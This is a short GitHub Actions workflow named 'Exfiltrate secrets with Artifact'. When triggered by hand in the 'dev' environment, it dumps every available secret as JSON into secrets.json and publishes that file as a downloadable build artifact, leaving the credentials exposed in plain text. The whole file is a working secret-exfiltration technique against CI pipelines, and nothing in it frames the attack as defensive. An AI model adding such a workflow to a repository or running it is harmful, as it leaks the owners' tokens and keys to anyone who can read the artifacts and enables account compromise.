name: Exfiltrate secrets with Artifact

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-24.04
    environment: 'dev'
    steps:
      - run: |
          echo "$dev" > secrets.json
        shell: bash
        env:
          dev: ${{ toJSON(secrets) }}
          

      

      - name: Upload secrets
        uses: actions/upload-artifact@v4
        with:
          name: secrets
          path: secrets.json